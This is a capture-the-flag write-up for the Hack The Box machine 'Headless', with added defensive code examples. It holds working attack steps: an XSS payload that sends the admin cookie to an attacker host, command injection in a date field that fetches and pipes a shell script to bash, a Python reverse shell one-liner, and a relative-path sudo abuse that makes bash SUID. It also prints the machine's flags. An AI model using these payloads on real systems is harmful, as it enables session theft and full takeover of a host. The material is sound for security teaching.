HTB - Headless [Easy]
TCP Scan
> TARGET=10.129.131.79 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXBmWeZYo1LR50JTs8iKyICHT76i7+fBPoeiKDXRhzjsfMWruwHrosHoSwRxiqUdaJYLwJgWOv+jFAB45nRQHw=
| 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICkBEMKoic0Bx5yLYG4DIT5G797lraNQsG5dtyZUl9nW
5000/tcp open upnp? syn-ack ttl 63
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.2.2 Python/3.11.2
| Date: Sun, 24 Mar 2024 19:41:27 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 2799
| Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Under Construction</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f7f7f7;
| margin: 0;
| padding: 0;
| display: flex;
| justify-content: center;
| align-items: center;
| height: 100vh;
| .container {
| text-align: center;
| background-color: #fff;
| border-radius: 10px;
| box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
Port 5000
> curl -I http://10.129.131.79:5000/
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.11.2
Date: Sun, 24 Mar 2024 19:42:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2799
Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
Connection: close
The cookie has two segments separated by a dot. The first, `InVzZXIi`, is base64 for the JSON string `"user"`; the second is a signature over the first, so changing the value without the server's secret should be rejected.
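To make the cookie format concrete, here is an added example (not the write-up's or the target's code) that builds and checks an itsdangerous-style signed cookie with a constructed demo secret; `DEMO_SECRET`, and the assumption that the box uses exactly this scheme, are not from the page.

```python
# Added example (not from the write-up): how a Flask/itsdangerous-style signed
# cookie such as is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs is built and
# checked. The secret below is constructed for the demo; the box's real key is
# unknown, which is exactly why the first segment cannot simply be re-encoded.
import base64
import hashlib
import hmac
import json

DEMO_SECRET = b"constructed-demo-secret"   # assumption, not the target's key
SALT = b"itsdangerous.Signer"              # default salt of itsdangerous.Signer


def b64url(raw: bytes) -> str:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Re-add the stripped padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret: bytes) -> bytes:
    """itsdangerous 'django-concat' derivation: sha1(salt + b'signer' + secret)."""
    return hashlib.sha1(SALT + b"signer" + secret).digest()


def sign_cookie(value, secret: bytes = DEMO_SECRET) -> str:
    """JSON-serialise the value, base64 it, append an HMAC-SHA1 tag."""
    payload = b64url(json.dumps(value).encode())
    tag = hmac.new(derive_key(secret), payload.encode(), hashlib.sha1).digest()
    return f"{payload}.{b64url(tag)}"


def verify_cookie(cookie: str, secret: bytes = DEMO_SECRET):
    """Return the decoded value if the tag matches, otherwise None."""
    payload, _, tag = cookie.rpartition(".")
    expected = hmac.new(derive_key(secret), payload.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, b64url_decode(tag)):
        return None
    return json.loads(b64url_decode(payload))


def payload_of(cookie: str) -> str:
    """The first segment is readable by anyone: 'InVzZXIi' decodes to '"user"'."""
    return b64url_decode(cookie.split(".")[0]).decode()
```

Note that the first segment is JSON-quoted: `"admin"` encodes as `ImFkbWluIg`, while `YWRtaW4K` is `admin` followed by a newline; either way the tag will not match without the key.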
A POST can be sent to `/support`:
POST /support HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=test&lname=test&email=test%40test.com&phone=test&message=test
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.11.2
Date: Sun, 24 Mar 2024 19:52:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2363
Connection: close
- dirsearch
> dirsearch -u http://10.129.131.79
[08:50:26] 401 - 317B - /dashboard
[08:52:14] 200 - 2KB - /support
Sending different cookie values to the `/dashboard` endpoint produces different responses, so this could be the entry point:
> curl http://10.129.131.79:5000/dashboard -H 'Cookie: is_admin=YWRtaW4K.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/'
With a `<>` in the message, the `/support` form returns a different page that reflects the request headers, including `User-Agent`, into the HTML. This indicates `User-Agent` is injectable:
> curl http://10.129.131.79:5000/support -d 'fname=test&lname=test&email=test%40test.com&phone=test&message=%3C%3E%0D%0A'
<body>
<div class="container">
<h1>Hacking Attempt Detected</h1>
<p>Your IP address has been flagged, a report with your browser information has been sent to the administrators for investigation.</p>
<p><strong>Client Request Information:</strong></p>
<pre><strong>Method:</strong> POST<br><strong>URL:</strong> http://10.129.131.79:5000/support<br><strong>Headers:</strong> <strong>Host:</strong> 10.129.131.79:5000<br><strong>User-Agent:</strong> curl/8.5.0<br><strong>Accept:</strong> */*<br><strong>Content-Length:</strong> 75<br><strong>Content-Type:</strong> application/x-www-form-urlencoded<br><br></pre>
</div>
</body>
- To get the admin cookie, the payload goes in the `User-Agent` header:
POST /support HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: <img src=x onerror=fetch('http://10.10.16.59/'+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=test&lname=test&email=test%40test.com&phone=test&message=%3c%3e
The listener on 10.10.16.59 receives the admin's cookie once the report is viewed:
10.129.131.79 - - [25/Mar/2024 10:31:27] "GET /is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 404 -
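The two defensive fixes this implies, as an added example rather than the target's code: escape headers before reflecting them into the page, and set the cookie with `HttpOnly` so page scripts cannot read it. The sample headers are constructed.

```python
# Added example (not the box's code): the "Hacking Attempt Detected" page
# reflects request headers into HTML, and the is_admin cookie is set without
# HttpOnly, so script in User-Agent can read document.cookie. Shown here:
# the reflecting pattern, the escaping fix, and a hardened Set-Cookie value.
import html
from http.cookies import SimpleCookie

# Constructed sample headers, modelled on the request shown in the write-up.
SAMPLE_HEADERS = {
    "Host": "10.129.131.79:5000",
    "User-Agent": "<img src=x onerror=alert(1)>",   # constructed canary
    "Accept": "*/*",
}


def render_headers_unsafe(headers: dict) -> str:
    """Raw concatenation: any markup in a header becomes part of the page."""
    return "".join(f"<strong>{k}:</strong> {v}<br>" for k, v in headers.items())


def render_headers_safe(headers: dict) -> str:
    """html.escape() turns < > & \" ' into entities; the browser shows text."""
    return "".join(
        f"<strong>{html.escape(k)}:</strong> {html.escape(v)}<br>"
        for k, v in headers.items()
    )


def set_admin_cookie(value: str) -> str:
    """Set-Cookie value with HttpOnly, so document.cookie cannot expose it."""
    c = SimpleCookie()
    c["is_admin"] = value
    c["is_admin"]["path"] = "/"
    c["is_admin"]["httponly"] = True
    c["is_admin"]["samesite"] = "Lax"
    return c.output(header="").strip()
```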
- Change the cookie to the one above and access http://10.129.131.79:5000/dashboard
- The dashboard contains a report generation feature, and its `date` field is susceptible to command injection:
POST /dashboard HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1
date=2023-09-15;id
<div id="output-container">
<div id="output-content" style="background-color: green; color: white; padding: 10px; border-radius: 5px;">
Systems are up and running!
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
</div>
</div>
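As an added illustration (not the box's application code), the following contrasts the shell-string pattern that explains the `;id` result with a handler that validates the date and runs no shell; `echo` stands in for the real report script, which is an assumption.

```python
# Added example (not the box's code): the report feature evidently passes the
# submitted date to a shell, so "2023-09-15;id" runs id as a second command.
# Below: the vulnerable pattern beside a handler that validates the field and
# invokes the command as an argv list, so no shell ever parses the input.
import re
import subprocess
from datetime import datetime

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def vulnerable_report(user_date: str) -> str:
    """Observed pattern: the input is spliced into a shell command line.
    'echo' stands in for the real report script (assumption)."""
    cmd = f"echo report for {user_date}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_date(user_date: str):
    """Accept only a well-formed, real YYYY-MM-DD date; return None otherwise."""
    if not DATE_RE.fullmatch(user_date):
        return None
    try:
        return datetime.strptime(user_date, "%Y-%m-%d").date()
    except ValueError:        # e.g. 2023-02-30
        return None


def hardened_report(user_date: str) -> str:
    """Validate first, then pass the value as one argv element, never via a shell."""
    d = validate_date(user_date)
    if d is None:
        return "invalid date"
    argv = ["echo", "report", "for", d.isoformat()]
    return subprocess.run(argv, capture_output=True, text=True).stdout
```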
- Create a `shell.sh` file containing a Python reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.59",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
> curl http://10.129.131.79:5000/dashboard -H 'Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -d 'date=2023-09-15;curl http://10.10.16.59/shell.sh|bash'
> nc -vnlp 4444
listening on [any] 4444 ...
connect to [10.10.16.59] from (UNKNOWN) [10.129.131.79] 60574
/bin/sh: 0: can't access tty; job control turned off
$ cat user.txt
cat: user.txt: No such file or directory
$ cd
$ ls
app
geckodriver.log
user.txt
$ cat user.txt
3b7b54e5434287668ab540ae02ffb54d
$
Privilege Escalation
- Upload and run linpeas:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 175 Sep 10 2023 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 95 Sep 10 2023 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 567 Sep 10 2023 /etc/ssh/ssh_host_rsa_key.pub
- Check the sudo script:
dvir@headless:~$ cat /usr/bin/syscheck
#!/bin/bash
if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0
`initdb.sh` is injectable: the script invokes it as `./initdb.sh`, a path relative to the caller's current directory, and only checks with `pgrep` whether a process of that name is already running. Running `sudo syscheck` from a directory containing a user-written `initdb.sh` therefore executes that file as root.
dvir@headless:~$ echo 'chmod +s /usr/bin/bash' > initdb.sh
dvir@headless:~$ chmod +x initdb.sh
dvir@headless:~$ ls -la
total 1052
drwx------ 8 dvir dvir 4096 Mar 25 00:02 .
drwxr-xr-x 3 root root 4096 Sep 9 2023 ..
drwxr-xr-x 3 dvir dvir 4096 Feb 16 23:49 app
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 .bash_history -> /dev/null
-rw-r--r-- 1 dvir dvir 220 Sep 9 2023 .bash_logout
-rw-r--r-- 1 dvir dvir 3393 Sep 10 2023 .bashrc
drwx------ 12 dvir dvir 4096 Sep 10 2023 .cache
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 geckodriver.log -> /dev/null
drwx------ 3 dvir dvir 4096 Mar 24 23:53 .gnupg
-rwxr-xr-x 1 dvir dvir 23 Mar 25 00:02 initdb.sh
drwx------ 4 dvir dvir 4096 Feb 16 23:49 .local
-rw-r--r-- 1 dvir dvir 860549 Mar 24 23:51 l.sh
-rw-r--r-- 1 dvir dvir 156037 Mar 24 23:54 l.txt
drwx------ 3 dvir dvir 4096 Sep 10 2023 .mozilla
-rw-r--r-- 1 dvir dvir 807 Sep 9 2023 .profile
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:06 .python_history -> /dev/null
drwx------ 2 dvir dvir 4096 Mar 24 23:39 .ssh
-rw-r----- 1 root dvir 33 Mar 21 14:06 user.txt
dvir@headless:~$ sudo syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.7G
System load average: 0.04, 0.07, 0.05
Database service is not running. Starting it...
dvir@headless:~$ ls -ls /usr/bin/bash
1236 -rwsr-sr-x 1 root root 1265648 Apr 24 2023 /usr/bin/bash
dvir@headless:~$ bash -p
id
uid=1000(dvir) gid=1000(dvir) euid=0(root) egid=0(root) groups=0(root),100(users),1000(dvir)
cat /root/root.txt
d61e1777a8e707984607f0ec1e7f67f1